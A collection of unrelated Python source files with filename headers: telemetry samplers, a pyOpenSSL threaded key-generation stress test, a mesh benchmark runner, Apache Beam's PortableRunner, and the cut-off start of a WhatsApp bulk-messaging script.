|
"""
Samplers to measure durations and garbage collection.
You instantiate a sampler with an ``ObservationBucket`` where sampled time
series get buffered. The bucket (memory buffer) is thread-safe and gets
automatically flushed to secondary storage when it fills up.
"""
import gc
from resource import getrusage, RUSAGE_SELF
from threading import Thread
from time import perf_counter, sleep
from uuid import uuid4
from server.telemetry.observation import ObservationBucket, observe, \
observe_many
class Timer:
"""
Thread-safe timer.
Examples:
>>> from time import sleep
>>> timer = Timer()
>>> outer_timer_id = timer.start()
>>> sleep(0.1)
>>> inner_timer_id = timer.start()
>>> sleep(0.1)
>>> inner_duration = timer.stop(inner_timer_id)
>>> sleep(0.1)
>>> outer_duration = timer.stop(outer_timer_id)
>>> outer_duration - inner_duration > 0.2
True
"""
def __init__(self):
"""
Create a new instance.
"""
self._timers = {}
@staticmethod
def _new_timer_id() -> str:
timer_id = uuid4()
return timer_id.hex
def start(self) -> str:
"""
Start a timer.
:return: the timer ID.
"""
timer_id = self._new_timer_id() # unique, avoids race conditions.
self._timers[timer_id] = perf_counter()
return timer_id
def stop(self, timer_id) -> float:
"""
Stop a previously started timer and compute how much time has elapsed
since starting it.
:param timer_id: the timer ID returned by the start call.
:return: time elapsed, in fractional seconds, from the start call.
"""
duration = perf_counter() - self._timers.pop(timer_id)
return duration
# NOTE. pop gets rid of the timer to keep memory footprint small
class DurationSampler:
"""
Samples durations, storing them in a given ``ObservationBucket``.
Examples:
>>> from time import sleep
>>> from server.telemetry.observation import measured
# Create a bucket with an action to print the measured values for the
# key "k". Set memory threshold to 0 to force calling the action on
# every write to the underlying observation store.
>>> def print_it(store): \
print([f"{measured(v):0.1}" for v in store.get('k',[])])
>>> bkt = ObservationBucket(empty_action=print_it, memory_threshold=0)
# Create a sampler with the above bucket as backend store.
>>> sampler = DurationSampler(bkt)
>>> sample_id = sampler.sample()
>>> sleep(0.1)
>>> sampler.collect('k', sample_id)
['0.1']
>>> sample_id = sampler.sample()
>>> sleep(0.2)
>>> sampler.collect('k', sample_id)
['0.2']
# Call the empty method when done sampling to make sure any left over
# data gets passed to the empty action which can then store it away.
>>> sampler.bucket().empty()
[]
"""
def __init__(self, bucket: ObservationBucket):
"""
Create a new instance.
:param bucket: backend memory buffer where to store data.
"""
self._bucket = bucket
self._timer = Timer()
def bucket(self) -> ObservationBucket:
"""
:return: backend memory buffer where data is stored.
"""
return self._bucket
def sample(self) -> str:
"""
Start a duration sample.
:return: the sample ID.
"""
return self._timer.start()
def collect(self, key: str, sample_id: str):
"""
End the specified duration sample and add it to the samples identified
by the given key.
:param key: identifies the duration series where the current sample
should be added.
:param sample_id: the sample ID as returned by the sample method when
the sample was started.
"""
duration = self._timer.stop(sample_id)
self._bucket.put(observe(key, duration))
GC_COLLECTIONS = 'gc collections'
"""
Label for the series of total GC collections measured by the ``GCSampler``.
"""
GC_COLLECTED = 'gc collected'
"""
Label for the series of total GC collected items measured by the ``GCSampler``.
"""
GC_UNCOLLECTABLE = 'gc uncollectable'
"""
Label for the series of total GC "uncollectable" items measured by the
``GCSampler``.
"""
class GCSampler:
"""
Produces aggregate stats about Python garbage collection.
This class generates the three series below.
**GC collections**. Each measurement in the series represents the total
number of times the GC collector swept memory since the interpreter was
started. (This is the total across all generations.) The series is labelled
with the value of ``GC_COLLECTIONS``.
**GC collected**. Each measurement in the series represents the total
number of objects the GC collector freed since the interpreter was started.
(This is the total across all generations.) The series is labelled with
the value of ``GC_COLLECTED``.
**GC uncollectable**. Each measurement in the series represents the total
number of objects the GC collector couldn't free since the interpreter was
started. (This is the total across all generations.) The series is labelled
with the value of ``GC_UNCOLLECTABLE``.
"""
def __init__(self, bucket: ObservationBucket):
"""
Create a new instance.
:param bucket: backend memory buffer where to store data.
"""
self._bucket = bucket
def bucket(self) -> ObservationBucket:
"""
:return: backend memory buffer where data is stored.
"""
return self._bucket
def sample(self):
"""
Sample the GC, aggregate the data, and add them to the series.
"""
xs = gc.get_stats()
data = [(x['collections'], x['collected'], x['uncollectable'])
for x in xs]
total_collections, total_collected, total_uncollectable = 0, 0, 0
for d in data:
total_collections += d[0]
total_collected += d[1]
total_uncollectable += d[2]
ys = observe_many((GC_COLLECTIONS, total_collections),
(GC_COLLECTED, total_collected),
(GC_UNCOLLECTABLE, total_uncollectable))
self._bucket.put(*ys)
PROC_USER_TIME = 'user time'
"""
Label for the user time series produced by the ``ProcSampler``.
"""
PROC_SYSTEM_TIME = 'system time'
"""
Label for the system time series produced by the ``ProcSampler``.
"""
PROC_MAX_RSS = 'max rss'
"""
Label for the maximum RSS series produced by the ``ProcSampler``.
"""
class ProcSampler:
"""
Collects OS resource usage data about this running process.
This class generates the three series below.
**User Time**. Each measurement in the series is the total amount of
time, in seconds, the process spent executing in user mode. The series
is labelled with the value of ``PROC_USER_TIME``.
**System Time**. Each measurement in the series is the total amount of
time, in seconds, the process spent executing in kernel mode. The series
is labelled with the value of ``PROC_SYSTEM_TIME``.
**Maximum RSS**. Each measurement in the series is maximum resident set
size used. The value will be in kilobytes on Linux and bytes on MacOS.
The series is labelled with the value of ``PROC_MAX_RSS``.
"""
def __init__(self, bucket: ObservationBucket):
"""
Create a new instance.
:param bucket: backend memory buffer where to store data.
"""
self._bucket = bucket
def bucket(self) -> ObservationBucket:
"""
:return: backend memory buffer where data is stored.
"""
return self._bucket
def sample(self):
"""
Probe process user time, system (kernel) time, maximum RSS and add
these values to their respective series.
"""
try:
os_data = getrusage(RUSAGE_SELF)
xs = observe_many((PROC_USER_TIME, os_data.ru_utime),
(PROC_SYSTEM_TIME, os_data.ru_stime),
(PROC_MAX_RSS, os_data.ru_maxrss))
self._bucket.put(*xs)
except (OSError, AttributeError): # AttributeError if os_data is None
return None
class RuntimeBackgroundSampler:
"""
Convenience class to sample GC and OS metrics at regular intervals in a
background daemon thread.
The thread goes on forever until the program exits, calling ``GCSampler``
and ``ProcSampler`` every ``sampling_interval`` seconds to collect GC and
OS-level metrics using a bucket you specify.
Just before the program exits, you should call the bucket's ``empty``
method to make sure any left over sampled data still in the memory buffer
gets processed by the bucket's empty action.
Usage pattern:
::
# at process start up
bucket = ObservationBucket(...)
RuntimeBackgroundSampler(bucket).spawn()
# background thread collects data...
# just before the process exits
bucket.empty()
Convenient, but not very flexible: there's no way to stop the background
thread and the thread dies abruptly when the program exits. This means
``RuntimeBackgroundSampler`` isn't suitable for buckets with empty actions
that should't be killed at random.
"""
def __init__(self, bucket: ObservationBucket,
sampling_interval: float = 1.0):
self._gc_sampler = GCSampler(bucket)
self._proc_sampler = ProcSampler(bucket)
self._interval = sampling_interval
def _run(self):
while True:
self._gc_sampler.sample()
self._proc_sampler.sample()
sleep(self._interval)
def spawn(self):
"""
Start the background sampling thread.
"""
t = Thread(target=self._run, args=())
t.daemon = True # (*)
t.start()
# NOTE. Daemon thread. This makes sure the program won't wait on this
# thread to complete before exiting, which is what we want b/c of the
# infinite loop in the run method. The downside is that when the Python
# interpreter quits, this thread will be interrupted abruptly.
|
thread-key-gen.py
|
# Copyright (C) Jean-Paul Calderone
# See LICENSE for details.
#
# Stress tester for thread-related bugs in RSA and DSA key generation. 0.12 and
# older held the GIL during these operations. Subsequent versions release it
# during them.
from threading import Thread
from OpenSSL.crypto import TYPE_RSA, TYPE_DSA, PKey
def generate_rsa():
keys = []
for i in range(100):
key = PKey()
key.generate_key(TYPE_RSA, 1024)
keys.append(key)
def generate_dsa():
keys = []
for i in range(100):
key = PKey()
key.generate_key(TYPE_DSA, 512)
keys.append(key)
def main():
threads = []
for i in range(3):
t = Thread(target=generate_rsa, args=())
threads.append(t)
t = Thread(target=generate_dsa, args=())
threads.append(t)
for t in threads:
t.start()
main()
|
run_benchmark.py
|
# Helper class to run tasks in multiple processes
import os
import subprocess
import shutil
import random
import argparse
import sys
from threading import Thread
from queue import Queue
# Simple task queue
class ShellTaskQueue(Queue):
def __init__(self, nWorkers=1, timeout=99999999999):
Queue.__init__(self)
self.nWorkers = nWorkers
self.timeout = timeout
self.task_count = 0
for i in range(self.nWorkers):
t = Thread(target=self.worker)
t.daemon = True
t.start()
def add_task(self, cmd_str):
self.put((self.task_count, cmd_str))
self.task_count += 1
def worker(self):
while True:
id, cmd_str = self.get()
print("running task {} / {} {}\n".format(id+1, self.task_count, cmd_str))
with subprocess.Popen(cmd_str, shell=True, stdout=open(os.devnull, 'w'), stderr=open(os.devnull, 'w'), preexec_fn=os.setsid) as process:
try:
output = process.communicate(timeout=self.timeout)[0]
except subprocess.TimeoutExpired:
print(" Timeout on {} :(".format(cmd_str))
os.killpg(process.pid, subprocess.signal.SIGINT) # send signal to the process group
output = process.communicate()[0]
except Exception as e:
print(" EXCEPTION ON {} !!!!".format(cmd_str))
print(str(e))
self.task_done()
# location of flip binaries, assumed relative to this file
BIN_DIR = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "build", "bin"))
def ensure_dir_exists(d):
if not os.path.exists(d):
os.makedirs(d)
def parse_file_list(f):
names = set()
for line in open(f, 'r').readlines():
if line[0] == '#': continue
raw_name = line.strip()
name , _ = os.path.splitext(os.path.basename(raw_name))
names.add(name)
return names
def main():
parser = argparse.ArgumentParser()
# Build arguments
parser.add_argument('--dataset_dir', type=str, required=True, help='directory of mesh files to run on')
parser.add_argument('--output_dir', type=str, required=True, help='where to put results')
parser.add_argument('--good_list', type=str, help='file with meshes which should be used (optional, otherwise all used. ignores paths and extensions.)')
parser.add_argument('--bad_list', type=str, help='file with meshes which should not be used, even if on good list (optional, otherwise none skipped)')
parser.add_argument('--n_threads', type=int, default=1, help='number of threads to run on')
parser.add_argument('--timeout', type=int, default=600, help='task timeout in seconds')
parser.add_argument('--max_meshes', type=int, default=-1)
parser.add_argument('--use_ffield_cones', action='store_true', help='use cones from a *.ffield file (must have the same base name as the mesh file and be in dataset_dir)')
parser.add_argument('--save_parameterized_meshes', action='store_true', help='save parameterized meshes as well as performance statistics. Meshes are placed in output_dir/meshes/')
# Parse arguments
args = parser.parse_args()
mesh_dir = os.path.join(args.output_dir, 'meshes')
ensure_dir_exists(args.output_dir)
if args.save_parameterized_meshes:
ensure_dir_exists(mesh_dir)
# save the arguments
with open(os.path.join(args.output_dir,"run_args.txt"), 'w') as f:
argstr = " ".join(sys.argv)
f.write(argstr)
# Deal with lists
if args.good_list:
good_set = parse_file_list(args.good_list)
if args.bad_list:
bad_set = parse_file_list(args.bad_list)
# Load the list of meshes
meshes = []
for f in os.listdir(args.dataset_dir):
# respect lists
f_name , f_ext = os.path.splitext(os.path.basename(f))
if f_ext not in [".obj", ".stl", ".ply", ".off"]:
continue
if args.good_list and f_name not in good_set:
continue
if args.bad_list and f_name in bad_set:
continue
meshes.append(os.path.join(args.dataset_dir, f))
if args.max_meshes > 0 and len(meshes) >= args.max_meshes:
break
print("Found {} input mesh files".format(len(meshes)))
# random.shuffle(meshes)
task_queue = ShellTaskQueue(nWorkers=args.n_threads, timeout=args.timeout)
for m_path in meshes:
m_basename = os.path.basename(m_path)
m_base, m_ext = os.path.splitext(m_basename)
if m_ext not in [".obj", ".stl", ".ply", ".off"]:
continue
output_path = os.path.join(args.output_dir, m_base + ".tsv")
ffield_path = os.path.join(os.path.splitext(m_path)[0] + ".ffield")
ffield_option = f"--ffield={ffield_path}" if args.use_ffield_cones else ""
output_mesh_path = os.path.join(mesh_dir, m_base + ".obj")
mesh_save_option = f"--outputMeshFilename={output_mesh_path}" if args.save_parameterized_meshes else ""
cmd_list = [
os.path.join(BIN_DIR,"parameterize"),
m_path,
ffield_option,
mesh_save_option,
f"--outputLogFilename={output_path}"
]
# build the command
cmd_str = " ".join(cmd_list)
task_queue.add_task(cmd_str)
task_queue.join()
if __name__ == "__main__":
main()
|
portable_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
# mypy: check-untyped-defs
from __future__ import absolute_import
from __future__ import division
import atexit
import functools
import itertools
import logging
import threading
import time
from typing import TYPE_CHECKING
from typing import Any
from typing import Dict
from typing import Iterator
from typing import Optional
from typing import Tuple
import grpc
from apache_beam.metrics import metric
from apache_beam.metrics.execution import MetricResult
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.options.value_provider import ValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import job_server
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability.fn_api_runner.fn_runner import translations
from apache_beam.runners.worker import sdk_worker_main
from apache_beam.runners.worker import worker_pool_main
from apache_beam.transforms import environments
if TYPE_CHECKING:
from google.protobuf import struct_pb2 # pylint: disable=ungrouped-imports
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.pipeline import Pipeline
from apache_beam.portability.api import beam_runner_api_pb2
__all__ = ['PortableRunner']
MESSAGE_LOG_LEVELS = {
beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.DRAINED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
ENV_TYPE_ALIASES = {'LOOPBACK': 'EXTERNAL'}
_LOGGER = logging.getLogger(__name__)
class JobServiceHandle(object):
"""
Encapsulates the interactions necessary to submit a pipeline to a job service.
The base set of interactions consists of 3 steps:
- prepare
- stage
- run
"""
def __init__(self, job_service, options, retain_unknown_options=False):
self.job_service = job_service
self.options = options
self.timeout = options.view_as(PortableOptions).job_server_timeout
self.artifact_endpoint = options.view_as(PortableOptions).artifact_endpoint
self._retain_unknown_options = retain_unknown_options
def submit(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""
Submit and run the pipeline defined by `proto_pipeline`.
"""
prepare_response = self.prepare(proto_pipeline)
artifact_endpoint = (
self.artifact_endpoint or
prepare_response.artifact_staging_endpoint.url)
self.stage(
proto_pipeline,
artifact_endpoint,
prepare_response.staging_session_token)
return self.run(prepare_response.preparation_id)
def get_pipeline_options(self):
# type: () -> struct_pb2.Struct
"""
Get `self.options` as a protobuf Struct
"""
# fetch runner options from job service
# retries in case the channel is not ready
def send_options_request(max_retries=5):
num_retries = 0
while True:
try:
# This reports channel is READY but connections may fail
# Seems to be only an issue on Mac with port forwardings
return self.job_service.DescribePipelineOptions(
beam_job_api_pb2.DescribePipelineOptionsRequest(),
timeout=self.timeout)
except grpc.FutureTimeoutError:
# no retry for timeout errors
raise
except grpc.RpcError as e:
num_retries += 1
if num_retries > max_retries:
raise e
time.sleep(1)
options_response = send_options_request()
def add_runner_options(parser):
for option in options_response.options:
try:
# no default values - we don't want runner options
# added unless they were specified by the user
add_arg_args = {'action': 'store', 'help': option.description}
if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
add_arg_args['action'] = 'store_true' \
if option.default_value != 'true' else 'store_false'
elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
add_arg_args['type'] = int
elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
add_arg_args['action'] = 'append'
parser.add_argument("--%s" % option.name, **add_arg_args)
except Exception as e:
# ignore runner options that are already present
# only in this case is duplicate not treated as error
if 'conflicting option string' not in str(e):
raise
_LOGGER.debug("Runner option '%s' was already added" % option.name)
all_options = self.options.get_all_options(
add_extra_args_fn=add_runner_options,
retain_unknown_options=self._retain_unknown_options)
return self.encode_pipeline_options(all_options)
@staticmethod
def encode_pipeline_options(
all_options: Dict[str, Any]) -> 'struct_pb2.Struct':
def convert_pipeline_option_value(v):
# convert int values: BEAM-5509
if type(v) == int:
return str(v)
elif isinstance(v, ValueProvider):
return convert_pipeline_option_value(
v.get()) if v.is_accessible() else None
return v
# TODO: Define URNs for options.
p_options = {
'beam:option:' + k + ':v1': convert_pipeline_option_value(v)
for k,
v in all_options.items() if v is not None
}
return job_utils.dict_to_struct(p_options)
def prepare(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> beam_job_api_pb2.PrepareJobResponse
"""Prepare the job on the job service"""
return self.job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job',
pipeline=proto_pipeline,
pipeline_options=self.get_pipeline_options()),
timeout=self.timeout)
def stage(self,
proto_pipeline, # type: beam_runner_api_pb2.Pipeline
artifact_staging_endpoint,
staging_session_token
):
# type: (...) -> None
"""Stage artifacts"""
if artifact_staging_endpoint:
artifact_service.offer_artifacts(
beam_artifact_api_pb2_grpc.ArtifactStagingServiceStub(
channel=grpc.insecure_channel(artifact_staging_endpoint)),
artifact_service.ArtifactRetrievalService(
artifact_service.BeamFilesystemHandler(None).file_reader),
staging_session_token)
def run(self, preparation_id):
# type: (str) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""Run the job"""
try:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=preparation_id),
timeout=self.timeout)
# If there's an error, we don't always get it until we try to read.
# Fortunately, there's always an immediate current state published.
state_stream = itertools.chain([next(state_stream)], state_stream)
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=preparation_id),
timeout=self.timeout)
except Exception:
# TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
state_stream = message_stream = None
# Run the job and wait for a result, we don't set a timeout here because
# it may take a long time for a job to complete and streaming
# jobs currently never return a response.
run_response = self.job_service.Run(
beam_job_api_pb2.RunJobRequest(preparation_id=preparation_id))
if state_stream is None:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=run_response.job_id))
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=run_response.job_id))
return run_response.job_id, message_stream, state_stream
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
def __init__(self):
self._dockerized_job_server = None # type: Optional[job_server.JobServer]
@staticmethod
def _create_environment(options):
# type: (PipelineOptions) -> environments.Environment
portable_options = options.view_as(PortableOptions)
# Do not set a Runner. Otherwise this can cause problems in Java's
# PipelineOptions, i.e. ClassNotFoundException, if the corresponding Runner
# does not exist in the Java SDK. In portability, the entry point is clearly
# defined via the JobService.
portable_options.view_as(StandardOptions).runner = None
environment_type = portable_options.environment_type
if not environment_type:
environment_urn = common_urns.environments.DOCKER.urn
elif environment_type.startswith('beam:env:'):
environment_urn = environment_type
else:
# e.g. handle LOOPBACK -> EXTERNAL
environment_type = ENV_TYPE_ALIASES.get(
environment_type, environment_type)
try:
environment_urn = getattr(
common_urns.environments, environment_type).urn
except AttributeError:
raise ValueError('Unknown environment type: %s' % environment_type)
env_class = environments.Environment.get_env_cls_from_urn(environment_urn)
return env_class.from_options(portable_options)
def default_job_server(self, options):
raise NotImplementedError(
'You must specify a --job_endpoint when using --runner=PortableRunner. '
'Alternatively, you may specify which portable runner you intend to '
'use, such as --runner=FlinkRunner or --runner=SparkRunner.')
def create_job_service_handle(self, job_service, options):
# type: (...) -> JobServiceHandle
return JobServiceHandle(job_service, options)
def create_job_service(self, options):
# type: (PipelineOptions) -> JobServiceHandle
"""
Start the job service and return a `JobServiceHandle`
"""
job_endpoint = options.view_as(PortableOptions).job_endpoint
if job_endpoint:
if job_endpoint == 'embed':
server = job_server.EmbeddedJobServer() # type: job_server.JobServer
else:
job_server_timeout = options.view_as(PortableOptions).job_server_timeout
server = job_server.ExternalJobServer(job_endpoint, job_server_timeout)
else:
server = self.default_job_server(options)
return self.create_job_service_handle(server.start(), options)
@staticmethod
def get_proto_pipeline(pipeline, options):
# type: (Pipeline, PipelineOptions) -> beam_runner_api_pb2.Pipeline
portable_options = options.view_as(PortableOptions)
proto_pipeline = pipeline.to_runner_api(
default_environment=PortableRunner._create_environment(
portable_options))
# TODO: https://issues.apache.org/jira/browse/BEAM-7199
# Eventually remove the 'pre_optimize' option alltogether and only perform
# the equivalent of the 'default' case below (minus the 'lift_combiners'
# part).
pre_optimize = options.view_as(DebugOptions).lookup_experiment(
'pre_optimize', 'default').lower()
if (not options.view_as(StandardOptions).streaming and
pre_optimize != 'none'):
if pre_optimize == 'default':
phases = [
translations.eliminate_common_key_with_none,
# TODO: https://issues.apache.org/jira/browse/BEAM-4678
# https://issues.apache.org/jira/browse/BEAM-11478
# Eventually remove the 'lift_combiners' phase from 'default'.
translations.lift_combiners,
translations.sort_stages
]
partial = True
elif pre_optimize == 'all':
phases = [
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.eliminate_common_key_with_none,
# TODO(BEAM-11715): Enable translations.pack_combiners.
# translations.pack_combiners,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# translations.sink_flattens,
translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
]
partial = False
elif pre_optimize == 'all_except_fusion':
# TODO(BEAM-7248): Delete this branch after PortableRunner supports
# beam:runner:executable_stage:v1.
phases = [
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.eliminate_common_key_with_none,
# TODO(BEAM-11715): Enable translations.pack_combiners.
# translations.pack_combiners,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# translations.sink_flattens,
# translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
]
partial = True
else:
phases = []
for phase_name in pre_optimize.split(','):
# For now, these are all we allow.
if phase_name in ('eliminate_common_key_with_none',
'pack_combiners',
'lift_combiners'):
phases.append(getattr(translations, phase_name))
else:
raise ValueError(
'Unknown or inapplicable phase for pre_optimize: %s' %
phase_name)
phases.append(translations.sort_stages)
partial = True
# All (known) portable runners (ie Flink and Spark) support these URNs.
known_urns = frozenset([
common_urns.composites.RESHUFFLE.urn,
common_urns.primitives.IMPULSE.urn,
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn
])
proto_pipeline = translations.optimize_pipeline(
proto_pipeline,
phases=phases,
known_runner_urns=known_urns,
partial=partial)
return proto_pipeline
def run_pipeline(self, pipeline, options):
# type: (Pipeline, PipelineOptions) -> PipelineResult
portable_options = options.view_as(PortableOptions)
# TODO: https://issues.apache.org/jira/browse/BEAM-5525
# portable runner specific default
if options.view_as(SetupOptions).sdk_location == 'default':
options.view_as(SetupOptions).sdk_location = 'container'
experiments = options.view_as(DebugOptions).experiments or []
# This is needed as we start a worker server if one is requested
# but none is provided.
if portable_options.environment_type == 'LOOPBACK':
use_loopback_process_worker = options.view_as(
DebugOptions).lookup_experiment('use_loopback_process_worker', False)
portable_options.environment_config, server = (
worker_pool_main.BeamFnExternalWorkerPoolServicer.start(
state_cache_size=
sdk_worker_main._get_state_cache_size(experiments),
data_buffer_time_limit_ms=
sdk_worker_main._get_data_buffer_time_limit_ms(experiments),
use_process=use_loopback_process_worker))
cleanup_callbacks = [functools.partial(server.stop, 1)]
else:
cleanup_callbacks = []
proto_pipeline = self.get_proto_pipeline(pipeline, options)
job_service_handle = self.create_job_service(options)
job_id, message_stream, state_stream = \
job_service_handle.submit(proto_pipeline)
result = PipelineResult(
job_service_handle.job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks)
if cleanup_callbacks:
# Register an exit handler to ensure cleanup on exit.
atexit.register(functools.partial(result._cleanup, on_exit=True))
_LOGGER.info(
'Environment "%s" has started a component necessary for the '
'execution. Be sure to run the pipeline using\n'
' with Pipeline() as p:\n'
' p.apply(..)\n'
'This ensures that the pipeline finishes before this program exits.',
portable_options.environment_type)
return result
class PortableMetrics(metric.MetricResults):
def __init__(self, job_metrics_response):
metrics = job_metrics_response.metrics
self.attempted = portable_metrics.from_monitoring_infos(metrics.attempted)
self.committed = portable_metrics.from_monitoring_infos(metrics.committed)
@staticmethod
def _combine(committed, attempted, filter):
all_keys = set(committed.keys()) | set(attempted.keys())
return [
MetricResult(key, committed.get(key), attempted.get(key))
for key in all_keys if metric.MetricResults.matches(filter, key)
]
def query(self, filter=None):
counters, distributions, gauges = [
self._combine(x, y, filter)
for x, y in zip(self.committed, self.attempted)
]
return {
self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges
}
class PipelineResult(runner.PipelineResult):
def __init__(
self,
job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks=()):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
self._message_stream = message_stream
self._state_stream = state_stream
self._cleanup_callbacks = cleanup_callbacks
self._metrics = None
self._runtime_exception = None
def cancel(self):
# type: () -> None
try:
self._job_service.Cancel(
beam_job_api_pb2.CancelJobRequest(job_id=self._job_id))
finally:
self._cleanup()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(
runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def metrics(self):
if not self._metrics:
job_metrics_response = self._job_service.GetJobMetrics(
beam_job_api_pb2.GetJobMetricsRequest(job_id=self._job_id))
self._metrics = PortableMetrics(job_metrics_response)
return self._metrics
def _last_error_message(self):
# type: () -> str
# Filter only messages with the "message_response" and error messages.
messages = [
m.message_response for m in self._messages
if m.HasField('message_response')
]
error_messages = [
m for m in messages
if m.importance == beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR
]
if error_messages:
return error_messages[-1].message_text
else:
return 'unknown error'
def wait_until_finish(self, duration=None):
"""
:param duration: The maximum time in milliseconds to wait for the result of
the execution. If None or zero, will wait until the pipeline finishes.
:return: The result of the pipeline, i.e. PipelineResult.
"""
def read_messages():
# type: () -> None
previous_state = -1
for message in self._message_stream:
if message.HasField('message_response'):
logging.log(
MESSAGE_LOG_LEVELS[message.message_response.importance],
"%s",
message.message_response.message_text)
else:
current_state = message.state_response.state
if current_state != previous_state:
_LOGGER.info(
"Job state changed to %s",
self._runner_api_state_to_pipeline_state(current_state))
previous_state = current_state
self._messages.append(message)
message_thread = threading.Thread(
target=read_messages, name='wait_until_finish_read')
message_thread.daemon = True
message_thread.start()
if duration:
state_thread = threading.Thread(
target=functools.partial(self._observe_state, message_thread),
name='wait_until_finish_state_observer')
state_thread.daemon = True
state_thread.start()
start_time = time.time()
duration_secs = duration / 1000
while (time.time() - start_time < duration_secs and
state_thread.is_alive()):
time.sleep(1)
else:
self._observe_state(message_thread)
if self._runtime_exception:
raise self._runtime_exception
return self._state
def _observe_state(self, message_thread):
try:
for state_response in self._state_stream:
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
# Wait for any last messages.
message_thread.join(10)
break
if self._state != runner.PipelineState.DONE:
self._runtime_exception = RuntimeError(
'Pipeline %s failed in state %s: %s' %
(self._job_id, self._state, self._last_error_message()))
except Exception as e:
self._runtime_exception = e
finally:
self._cleanup()
def _cleanup(self, on_exit=False):
# type: (bool) -> None
if on_exit and self._cleanup_callbacks:
_LOGGER.info(
'Running cleanup on exit. If your pipeline should continue running, '
'be sure to use the following syntax:\n'
' with Pipeline() as p:\n'
' p.apply(..)\n'
'This ensures that the pipeline finishes before this program exits.')
has_exception = None
for callback in self._cleanup_callbacks:
try:
callback()
except Exception:
has_exception = True
self._cleanup_callbacks = ()
if has_exception:
raise
|
PyAutoWp.py
|
import main
import check
from threading import Thread
check.windowCheck()
while True:
a = main.wcbo("Please choose an option:\n1-I will send my message to many people.\n2-I will send my message to 1 person.", "1 or 2: ", ["1","2"])
if a == "1":
phoneNumberData = check.phoneListCheck()
phoneNumberData = main.contacts_df_edit(phoneNumberData)
message = check.messageCheck()
a = check.timerCheck()
if a == True:
t = main.wcb("Enter the date and time to send the message", "(example: day.month.year 21:00): ")
tz = list(map(main.differentCountryTimer,phoneNumberData["Phone Number"]))
phoneNumberData["tz"] = tz
tz_list = list(set(tz))
th_list = []
pnd = []
